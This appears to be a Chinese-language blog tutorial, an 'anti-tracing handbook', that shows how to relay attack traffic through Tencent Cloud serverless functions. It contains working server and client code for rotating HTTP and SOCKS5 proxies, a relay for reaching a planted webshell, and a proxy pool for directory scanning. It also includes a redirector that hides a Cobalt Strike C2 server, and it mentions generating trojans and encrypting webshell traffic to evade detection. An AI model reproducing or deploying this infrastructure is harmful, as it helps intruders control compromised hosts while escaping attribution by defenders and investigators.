千尋筆記:防溯源手冊(云函數篇)
云函數簡介
云函數(Serverless Cloud Function,SCF)是騰訊云為企業和開發者們提供的無服務器執行環境,可以無需購買和管理服務器的情況下運行代碼。只需使用平臺支持的語言編寫核心代碼并設置代碼運行的條件,即可在騰訊云基礎設施上彈性、安全地運行代碼。SCF是實時文件處理和數據處理等場景下理想的計算平臺。總結云函數的幾個特性:
- 多出口
- 調用時創建執行
- 無需服務器承載
由于云函數無法長駐,調用的時候創建,執行完之后立即就銷毀,所以無法直接保存狀態。也正是這一點,讓我們無法代理像 SSH 這種需要長連接的服務,只能代理 HTTP(s) 這種無狀態的協議。
云函數不能直接調用,同時還需要創建一個觸發器來觸發云函數,為了方便,我們選擇使用API 網關觸發器,只需要一個 HTTP 請求就能觸發。
騰訊云函數地址:
https://console.cloud.tencent.com/scf/index
Part 1 HTTP Proxy
客戶端掛上代理發送數據包,HTTP 代理服務器攔截數據包,提取 HTTP 報文相關信息,然后將報文以某種形式 POST 到云函數進行解析,云函數根據解析到的信息對目標發起請求,最終將結果一層一層返回。
服務端配置
云函數基礎配置
選擇自定義創建,地域自選,部署模式,代碼部署,運行環境Python3.6,其余默認即可。

函數代碼配置
然后配置函數代碼,服務端代碼server.py:
# -*- coding: utf8 -*-import jsonimport picklefrom base64 import b64decode, b64encode
import requests
SCF_TOKEN = "TOKEN" #需要自定義隨機值,用于鑒權
def authorization(): return { "isBase64Encoded": False, "statusCode": 401, "headers": {}, "body": "Please provide correct SCF-Token", }
def main_handler(event: dict, context: dict): try: token = event["headers"]["scf-token"] except KeyError: return authorization()
if token != SCF_TOKEN: return authorization()
data = event["body"] kwargs = json.loads(data) kwargs['data'] = b64decode(kwargs['data']) r = requests.request(**kwargs, verify=False, allow_redirects=False)
serialized_resp = pickle.dumps(r)
return { "isBase64Encoded": False, "statusCode": 200, "headers": {}, "body": b64encode(serialized_resp).decode("utf-8"), }
需要修改 server.py 中的 SCF_TOKEN 為隨機值,該值將用于鑒權, client.py 中的 SCF_TOKEN需要與server.py中的SCF_TOKEN保持一致。

高級配置
云函數操作最大超時限制默認為 3 秒,可以將云函數環境配置中的執行超時時間拉滿,其余默認即可

創建觸發器
配置完上面的所有內容后,創建觸發器,自定義觸發器,
觸發方式選擇 API 網關觸發,其他保持不變即可

創建好觸發器之后,基本配置就完成了,點擊完成,等待函數配置完成,就會跳轉到管理頁面,我們找到觸發管理,其中訪問路徑就是我們的云函數訪問地址。

服務端就基本配置好了,下面還需要配置一下客戶端。
客戶端配置
本地代理這里使用的是mitmproxy,可以直接pip安裝
pip3 install mitmproxy
如果需要代理 HTTPS流量需安裝證書。首次運行 mitmdump命令,證書目錄自動生成在在 ~/.mitmproxy中,安裝并信任。


下面需要配置客戶端client.py代碼,需要將觸發器中的訪問路徑添加至 client.py 中 scf_servers變量中,以逗號 , 分隔。scf_servers 參數可以添加多個API接口,這樣就可以獲取更多的IP池。
# -*- coding: utf8 -*-import jsonimport picklefrom typing import Listfrom random import choicefrom urllib.parse import urlparsefrom base64 import b64encode, b64decodeimport mitmproxy
scf_servers: List[str] = [] #API接口地址SCF_TOKEN = "TOKEN" #與server.py保持一致
def request(flow: mitmproxy.http.HTTPFlow): scf_server = choice(scf_servers) r = flow.request data = { "method": r.method, "url": r.pretty_url, "headers": dict(r.headers), "cookies": dict(r.cookies), "params": dict(r.query), "data": b64encode(r.raw_content).decode("ascii"), }
flow.request = flow.request.make( "POST", url=scf_server, content=json.dumps(data), headers={ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Encoding": "gzip, deflate, compress", "Accept-Language": "en-us;q=0.8", "Cache-Control": "max-age=0", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "Connection": "close", "Host": urlparse(scf_server).netloc, "SCF-Token": SCF_TOKEN, }, )
def response(flow: mitmproxy.http.HTTPFlow): if flow.response.status_code != 200: mitmproxy.ctx.log.warn("Error")
if flow.response.status_code == 401: flow.response.headers = Headers(content_type="text/html;charset=utf-8") return
if flow.response.status_code == 433: flow.response.headers = Headers(content_type="text/html;charset=utf-8") flow.response.text = "操作超時,可在函數配置中修改執行超時時間" return
if flow.response.status_code == 200: body = flow.response.content.decode("utf-8") resp = pickle.loads(b64decode(body))
r = flow.response.make( status_code=resp.status_code, headers=dict(resp.headers), content=resp.content, ) flow.response = r
配置好之后就可以開啟代理
mitmdump -s client.py -p 8081 --no-http2

瀏覽器配置好HTTP代理,測試效果:


查看IP Info均為騰訊云的地址,并且每一次訪問IP都會變:

Part 2 SOCKS5
正常SOCKS5代理請求的流程為服務端監聽來自客戶端的請求,當客戶端發起一個新的連接。服務端生成一個socket A,并從數據包中解析出目標服務器的地址和端口,在本地對目標發起一個socket B,同步兩個socket 的 IO 操作。
socket可對外發起連接,云函數能對外發包,因此我們可以將云函數當作中間人,一側對 VPS 發起連接,另一側對目標服務器發起連接。
正常 SOCKS5 代理請求的流程為服務端監聽來自客戶端的請求,當客戶端發起一個新的連接,服務端生成一個 socket A,并從數據包中解析出目標服務器的地址和端口,在本地對目標發起一個 socket B,同步兩個 socket 的 IO 操作。
socket可對外發起連接,云函數能對外發包,因此我們可以將云函數當作中間人,一側對 VPS 發起連接,另一側對目標服務器發起連接。
SOCKS5主要分為 3 個步驟:
認證:對客戶端發起的連接進行認證
建立連接:從客戶端發起的連接中讀取數據,獲得目標服務器地址,并建立連接。
轉發數據:分別將來自客戶端、服務器的數據轉發給對方
云函數配置
基礎配置

函數代碼
# -*- coding: utf8 -*-# server.pyimport jsonimport socketimport select
bridge_ip = "ip"bridge_port = port
def main_handler(event, context): data = json.loads(event["body"]) out = socket.socket(socket.AF_INET, socket.SOCK_STREAM) out.connect((data["host"], data["port"]))
bridge = socket.socket(socket.AF_INET, socket.SOCK_STREAM) bridge.connect((bridge_ip, bridge_port)) bridge.send(data["uid"].encode("ascii"))
while True: readable, _, _ = select.select([out, bridge], [], []) if out in readable: data = out.recv(4096) bridge.send(data) if bridge in readable: data = bridge.recv(4096) out.send(data)
需要修改 server.py中的 bridge_ip與 bridge_port為自己 VPS的 ip及開啟監聽的端口

高級配置
修改云函數超時時間為 900s,這樣一個 SOCKS5 連接最多維持 15m

創建觸發器

云函數配置好之后,保存一下觸發管理中的訪問路徑。

客戶端配置
socks5.py代碼:
# Python >= 3.8import asyncioimport argparsefrom socket import inet_ntoafrom functools import partial
import uvloopimport shortuuid
from bridge import scf_handlefrom models import Conn, http, uid_socketfrom utils import print_time, parse_args, cancel_task
async def socks_handle( args: argparse.Namespace, reader: asyncio.StreamReader, writer: asyncio.StreamWriter): client = Conn("Client", reader, writer)
await socks5_auth(client, args) remote_addr, port = await socks5_connect(client)
client.target = f"{remote_addr}:{port}" uid = shortuuid.ShortUUID().random(length=4) uid_socket[uid] = client
data = {"host": remote_addr, "port": port, "uid": uid} await http.post(args.scf_url, json=data)
async def socks5_auth(client: Conn, args: argparse.Namespace): ver, nmethods = await client.read(2)
if ver != 0x05: client.close() cancel_task(f"Invalid socks5 version: {ver}")
methods = await client.read(nmethods)
if args.user and b"\x02" not in methods: cancel_task( f"Unauthenticated access from {client.writer.get_extra_info('peername')[0]}" )
if b"\x02" in methods: await client.write(b"\x05\x02") await socks5_user_auth(client, args) else: await client.write(b"\x05\x00")
async def socks5_user_auth(client: Conn, args: argparse.Namespace): ver, username_len = await client.read(2) if ver != 0x01: client.close() cancel_task(f"Invalid socks5 user auth version: {ver}")
username = (await client.read(username_len)).decode("ascii") password_len = ord(await client.read(1)) password = (await client.read(password_len)).decode("ascii")
if username == args.user and password == args.passwd: await client.write(b"\x01\x00") else: await client.write(b"\x01\x01") cancel_task( f"Wrong user/passwd connection from {client.writer.get_extra_info('peername')[0]}" )
async def socks5_connect(client: Conn): ver, cmd, _, atyp = await client.read(4) if ver != 0x05: client.close() cancel_task(f"Invalid socks5 version: {ver}") if cmd != 1: client.close() cancel_task(f"Invalid socks5 cmd type: {cmd}")
if atyp == 1: address = await client.read(4) remote_addr = inet_ntoa(address) elif atyp == 3: addr_len = await client.read(1) address = await client.read(ord(addr_len)) remote_addr = address.decode("ascii") elif atyp == 4: cancel_task("IPv6 not supported") else: cancel_task("Invalid address type")
port = int.from_bytes(await client.read(2), byteorder="big")
# Should return bind address and port, but it's ok to just return 0.0.0.0 await client.write(b"\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00") return remote_addr, port
async def main(): args = parse_args() handle = partial(socks_handle, args)
if not args.user: print_time("[ALERT] Socks server runs without authentication")
await http.init_session() socks_server = await asyncio.start_server(handle, args.listen, args.socks_port) print_time(f"SOCKS5 Server listening on: {args.listen}:{args.socks_port}") await asyncio.start_server(scf_handle, args.listen, args.bridge_port) print_time(f"Bridge Server listening on: {args.listen}:{args.bridge_port}")
try: await socks_server.serve_forever() except asyncio.CancelledError: await http.close()
if __name__ == "__main__": uvloop.install() try: asyncio.run(main()) except KeyboardInterrupt: print_time("[INFO] User stoped server")
然后在 VPS上開啟 SOCKS5代理:
python3 socks5.py -u "https://service-xxx.sh.apigw.tencentcs.com/release/xxx" -bp 9001 -sp 9002 --user test --passwd test
- -u 參數需要填寫 API 網關提供的地址,必填
- -l 表示本機監聽的 ip,默認為 0.0.0.0
- -sp 表示 SOCKS5 代理監聽的端口,必填
- -bp 表示用于監聽來自云函數連接的端口,與 server.py 中的 bridge_port 相同,必填
- --user 和 --passwd 用于 SOCKS5 服務器對連接進行身份驗證,客戶端需配置相應的用戶名和密碼

配置好socks5代理

測試效果:


Part 3 Webshell
通過騰訊云的云函數將我們的請求進行轉發
云函數配置
基礎配置

函數代碼
函數服務->函數管理->函數代碼
# -*- coding: utf8 -*-import requestsimport json
def geturl(urlstr): jurlstr = json.dumps(urlstr) dict_url = json.loads(jurlstr) return dict_url['u']
def main_handler(event, context): url = geturl(event['queryString']) postdata = event['body'] headers=event['headers'] resp=requests.post(url,data=postdata,headers=headers,verify=False) response={ "isBase64Encoded": False, "statusCode": 200, "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding}, "body": resp.text } return response
高級配置
默認即可
創建觸發器

創建好云函數之后,保存訪問路徑地址

連接Webshell
webshell完整url:
https://service-xxxx.com/release/xxx?u=http://xx.xx.xx.xx/1.php

可以看到每次連接的IP都不一樣,都是騰訊云的地址:


通過云函數的方法我們可以隱藏連接Webshell的本機IP地址,從而防止溯源,為了達到更加隱秘的目的,可以對Webshell流量進行加解密的來逃逸流量檢測,通過流量檢測+白名單IOC的方式可以完美的逃避檢測。
Part 4 代理池
通過客戶端監聽獲取請求并且組裝API請求,服務端云函數解析且重組API請求。
云函數配置
基礎設置
還是選擇自定義創建,但是運行環境這里要選擇Go,而不是默認的python

函數代碼
執行方法改為server,且選擇本地上傳zip,將server.zip上傳上去。

創建觸發器

配置好之后,保存訪問路徑

測試效果
./client -port 10086 https://service-xxxx.com/release/xxx

用dirsearch代理掃描測試效果

代理掃描結果:

無代理掃描結果:

查看一下IP Info

Part 5 C2隱藏
云函數配置
隱藏C2不需要添加任何代碼,只需要在API網關注冊服務即可。按照正常流程創建好觸發器后,點擊API網關,進行配置:



配置后端類型為公網URL/IP,后端域名配置自己的 CS 服務器,后端超時時間自己看著來

配置完成后,大概這樣:

C2配置
這里也可以自定義C2的profile,混淆流量

創建監聽器

選擇此監聽器,生成木馬,或者生成payload制作免殺等都可以,成功上線

查看網絡連接,找到可疑連接,定位木馬,反查IP



利用微步云沙箱對木馬nginx.exe進行分析網絡行為可以看到請求地址也為騰訊云函數地址,無法溯源到真正地址


另外還有一種配置云函數代碼隱藏C2,云函數代碼,自行測試
# coding: utf8import json,requests,base64def main_handler(event, context): response = {} path = None headers = None try: C2='http://ip:80' #必須為80端口 if 'path' in event.keys(): path=event['path'] if 'headers' in event.keys(): headers=event['headers'] if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' : resp=requests.get(C2+path,headers=headers,verify=False) else: resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False) print(resp.headers) print(resp.content) response={ "isBase64Encoded": True, "statusCode": resp.status_code, "headers": dict(resp.headers), "body": str(base64.b64encode(resp.content))[2:-1] } except Exception as e: print('error') print(e) finally: return response
與無代碼配置的方法不同在于配置API網關,注冊服務時,只需要配置前端配置,不需要配置后端,就直接點完成,發布即可。